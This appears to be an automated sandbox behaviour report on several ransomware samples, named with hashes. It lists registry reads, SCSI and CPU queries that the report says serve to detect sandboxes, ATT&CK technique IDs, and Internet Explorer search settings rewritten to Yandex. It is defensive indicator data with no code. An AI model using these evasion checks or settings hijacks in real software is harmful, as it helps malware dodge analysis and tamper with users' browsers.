Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.GandCrypt.jes-02d9a0751c2695ce9962f9658409f59a8aab0657d1629c9f688c10dbe7dae485.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	browser.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	browser.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	browser.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Bitman.pef-44ebaf4e63fff8d32b82f43078b4a786052d0a7b1cb4c82e491c10099df3e7d8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wsmprovhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.PornoAsset.dggw-f0c7d7525fdd13a49730e5cef8d6ea3d95361dbd439082c2c0701139460fa708.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	y_installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	lakii.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	browser.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spools.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Bitman.vho-67050ba69d0531459e14b74d23c29f0691330b5b020097e4167cb22311077748.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.GandCrypt.jhu-2c442eba1098b401f2209d9c3434abeb472f635bed8e25c44d33a5f12b65c8c6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Foreign.oifc-e70d17459b65c266bd5c8eefc2e76b2c2709bf629e01e71c27d09382ac18dc3e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spools.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spools.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	y_installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	seederexe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spools.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spools.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	browser.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sender.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Crusis.dg-a8987722e326199edfa57b05912e962115d7e408ece800b53ed84a78d6a195a6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spools.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	service_update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spools.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HEUR-Trojan-Ransom.Win32.Shade.gen-b89ae460c4a36180e3fe0e578e5f36354c438ae36324beaeef889ff69425653b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spools.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spools.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	browser.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ybF20C.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spools.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.GandCrypt.aze-9b25be0199da1593eb09964fc91857e135ba04e254490cc942b1276bf03b8042.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spools.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	browser.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Yandex.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Blocker.gpjb-9aaa3d6cd47171f08169c6f96f721ae1820b655393f3410aa31891c133e0d015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spools.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spools.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.GandCrypt.bvu-530779b0c9039c984af2c9f625da1ce89dc59fb4c923cf377781e035d6dac58c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	clidmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	setup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Trojan-Ransom.Win32.Sodin.aas-ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	clidmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spools.exe

System Time Discovery 1 TTPs 1 IoCs

Adversary may gather the system time and/or time zone settings from a local or remote system.

discovery

System Time Discovery

T1124

pid	Process
6340	setup.exe

Checks SCSI registry key(s) 3 TTPs 26 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Filters	Trojan-Ransom.Win32.GandCrypt.aze-9b25be0199da1593eb09964fc91857e135ba04e254490cc942b1276bf03b8042.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\UpperFilters	Trojan-Ransom.Win32.GandCrypt.aze-9b25be0199da1593eb09964fc91857e135ba04e254490cc942b1276bf03b8042.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	Trojan-Ransom.Win32.GandCrypt.aze-9b25be0199da1593eb09964fc91857e135ba04e254490cc942b1276bf03b8042.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\UpperFilters	Trojan-Ransom.Win32.GandCrypt.aze-9b25be0199da1593eb09964fc91857e135ba04e254490cc942b1276bf03b8042.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\UpperFilters	Trojan-Ransom.Win32.GandCrypt.aze-9b25be0199da1593eb09964fc91857e135ba04e254490cc942b1276bf03b8042.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\UpperFilters	Trojan-Ransom.Win32.GandCrypt.aze-9b25be0199da1593eb09964fc91857e135ba04e254490cc942b1276bf03b8042.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001	Trojan-Ransom.Win32.GandCrypt.aze-9b25be0199da1593eb09964fc91857e135ba04e254490cc942b1276bf03b8042.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	Trojan-Ransom.Win32.GandCrypt.aze-9b25be0199da1593eb09964fc91857e135ba04e254490cc942b1276bf03b8042.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\LowerFilters	Trojan-Ransom.Win32.GandCrypt.aze-9b25be0199da1593eb09964fc91857e135ba04e254490cc942b1276bf03b8042.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Filters	Trojan-Ransom.Win32.GandCrypt.aze-9b25be0199da1593eb09964fc91857e135ba04e254490cc942b1276bf03b8042.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\LowerFilters	Trojan-Ransom.Win32.GandCrypt.aze-9b25be0199da1593eb09964fc91857e135ba04e254490cc942b1276bf03b8042.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Filters	Trojan-Ransom.Win32.GandCrypt.aze-9b25be0199da1593eb09964fc91857e135ba04e254490cc942b1276bf03b8042.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\LowerFilters	Trojan-Ransom.Win32.GandCrypt.aze-9b25be0199da1593eb09964fc91857e135ba04e254490cc942b1276bf03b8042.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Service	Trojan-Ransom.Win32.GandCrypt.aze-9b25be0199da1593eb09964fc91857e135ba04e254490cc942b1276bf03b8042.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Filters	Trojan-Ransom.Win32.GandCrypt.aze-9b25be0199da1593eb09964fc91857e135ba04e254490cc942b1276bf03b8042.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	Trojan-Ransom.Win32.GandCrypt.aze-9b25be0199da1593eb09964fc91857e135ba04e254490cc942b1276bf03b8042.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service	Trojan-Ransom.Win32.GandCrypt.aze-9b25be0199da1593eb09964fc91857e135ba04e254490cc942b1276bf03b8042.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service	Trojan-Ransom.Win32.GandCrypt.aze-9b25be0199da1593eb09964fc91857e135ba04e254490cc942b1276bf03b8042.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\LowerFilters	Trojan-Ransom.Win32.GandCrypt.aze-9b25be0199da1593eb09964fc91857e135ba04e254490cc942b1276bf03b8042.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Service	Trojan-Ransom.Win32.GandCrypt.aze-9b25be0199da1593eb09964fc91857e135ba04e254490cc942b1276bf03b8042.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Trojan-Ransom.Win32.GandCrypt.jdv-bfe57e23766e9709df6e275a6f4eb3dd841882c8b155398911491a99dde77732.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Trojan-Ransom.Win32.GandCrypt.jdv-bfe57e23766e9709df6e275a6f4eb3dd841882c8b155398911491a99dde77732.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Trojan-Ransom.Win32.GandCrypt.jdv-bfe57e23766e9709df6e275a6f4eb3dd841882c8b155398911491a99dde77732.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Trojan-Ransom.Win32.GandCrypt.jes-02d9a0751c2695ce9962f9658409f59a8aab0657d1629c9f688c10dbe7dae485.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Trojan-Ransom.Win32.GandCrypt.jes-02d9a0751c2695ce9962f9658409f59a8aab0657d1629c9f688c10dbe7dae485.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Trojan-Ransom.Win32.GandCrypt.jes-02d9a0751c2695ce9962f9658409f59a8aab0657d1629c9f688c10dbe7dae485.exe

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	browser.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	browser.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	browser.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	browser.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	browser.exe

Modifies Internet Explorer settings 1 TTPs 56 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\buffer\SuggestionsURL = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IESS02&market={language}"	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\buffer\NTTopResultURL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IENTTR"	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTLogoURL = "http://downloader.yandex.net/banner/ntpagelogo/{language}/{scalelevel}.png"	seederexe.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\f1b285d6-9bc2-11ef-a20a-fe5a08828e79	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\f1b285d6-9bc2-11ef-a20a-fe5a08828e79\URL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02"	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\f1b285d6-9bc2-11ef-a20a-fe5a08828e79\DisplayName = "Яндекс"	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\f1b285d6-9bc2-11ef-a20a-fe5a08828e79\FaviconURLFallback = "https://www.ya.ru/favicon.ico"	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\buffer\NTLogoPath = "C:\\Users\\Admin\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\"	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\buffer\NTLogoURL = "http://go.microsoft.com/fwlink/?LinkID=403856&language={language}&scale={scalelevel}&contrast={contrast}"	seederexe.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}	seederexe.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Internet Explorer\SearchScopes	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\f1b285d6-9bc2-11ef-a20a-fe5a08828e79\SuggestionsURL	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\buffer\FaviconPath = "C:\\Users\\Admin\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico"	seederexe.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\LinksBandEnabled = "1"	seederexe.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\f1b285d6-9bc2-11ef-a20a-fe5a08828e79	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\f1b285d6-9bc2-11ef-a20a-fe5a08828e79\SuggestionsURLFallback = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IESS02&market={language}"	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\DefaultScope = "{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURL_JSON = "https://suggest.yandex.ru/suggest-ff.cgi?uil=ru&part={searchTerms}"	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\f1b285d6-9bc2-11ef-a20a-fe5a08828e79\NTSuggestionsURL = "http://api.bing.com/qsml.aspx?query={searchTerms}&market={language}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IENTSS"	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\f1b285d6-9bc2-11ef-a20a-fe5a08828e79\SuggestionsURL = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IESS02&market={language}"	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\f1b285d6-9bc2-11ef-a20a-fe5a08828e79\NTLogoURL = "http://go.microsoft.com/fwlink/?LinkID=403856&language={language}&scale={scalelevel}&contrast={contrast}"	seederexe.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Internet Explorer\Main	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\f1b285d6-9bc2-11ef-a20a-fe5a08828e79\FaviconPath = "C:\\Users\\Admin\\AppData\\Local\\MICROS~1\\INTERN~1\\Services\\YANDEX~1.ICO"	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\buffer\URL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IESR02"	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURL	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\f1b285d6-9bc2-11ef-a20a-fe5a08828e79\DisplayName = "Bing"	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\f1b285d6-9bc2-11ef-a20a-fe5a08828e79\SuggestionsURL_JSON = "https://suggest.yandex.ru/suggest-ff.cgi?uil=ru&part={searchTerms}"	seederexe.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\ShowSearchSuggestionsInAddressGlobal = "1"	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\NTURL = "https://yandex.ru/search/?win=671&clid=2278734-666&text={searchTerms}"	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\f1b285d6-9bc2-11ef-a20a-fe5a08828e79\URL = "https://yandex.ru/search/?win=671&clid=2278732-666&text={searchTerms}"	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\f1b285d6-9bc2-11ef-a20a-fe5a08828e79\NTLogoURL = "http://downloader.yandex.net/banner/ntpagelogo/{language}/{scalelevel}.png"	seederexe.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\buffer	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\FaviconPath = "C:\\Users\\Admin\\AppData\\Local\\MICROS~1\\INTERN~1\\Services\\YANDEX~1.ICO"	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\buffer\DisplayName = "Bing"	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\buffer\NTURL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IENTSR"	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\f1b285d6-9bc2-11ef-a20a-fe5a08828e79\NTURL = "http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IENTSR"	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\f1b285d6-9bc2-11ef-a20a-fe5a08828e79\NTURL = "https://yandex.ru/search/?win=671&clid=2278734-666&text={searchTerms}"	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\f1b285d6-9bc2-11ef-a20a-fe5a08828e79\NTTopResultURL	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\buffer\SuggestionsURLFallback = "http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IESS02&market={language}"	seederexe.exe
Key created	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\URL = "https://yandex.ru/search/?win=671&clid=2278732-666&text={searchTerms}"	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\f1b285d6-9bc2-11ef-a20a-fe5a08828e79\FaviconURLFallback = "http://www.bing.com/favicon.ico"	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\f1b285d6-9bc2-11ef-a20a-fe5a08828e79\NTLogoPath = "C:\\Users\\Admin\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\Services\\"	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\f1b285d6-9bc2-11ef-a20a-fe5a08828e79\YaCreationDate = "2024-11-05"	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\buffer\NTSuggestionsURL = "http://api.bing.com/qsml.aspx?query={searchTerms}&market={language}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IENTSS"	seederexe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\DisplayName = "Яндекс"	seederexe.exe
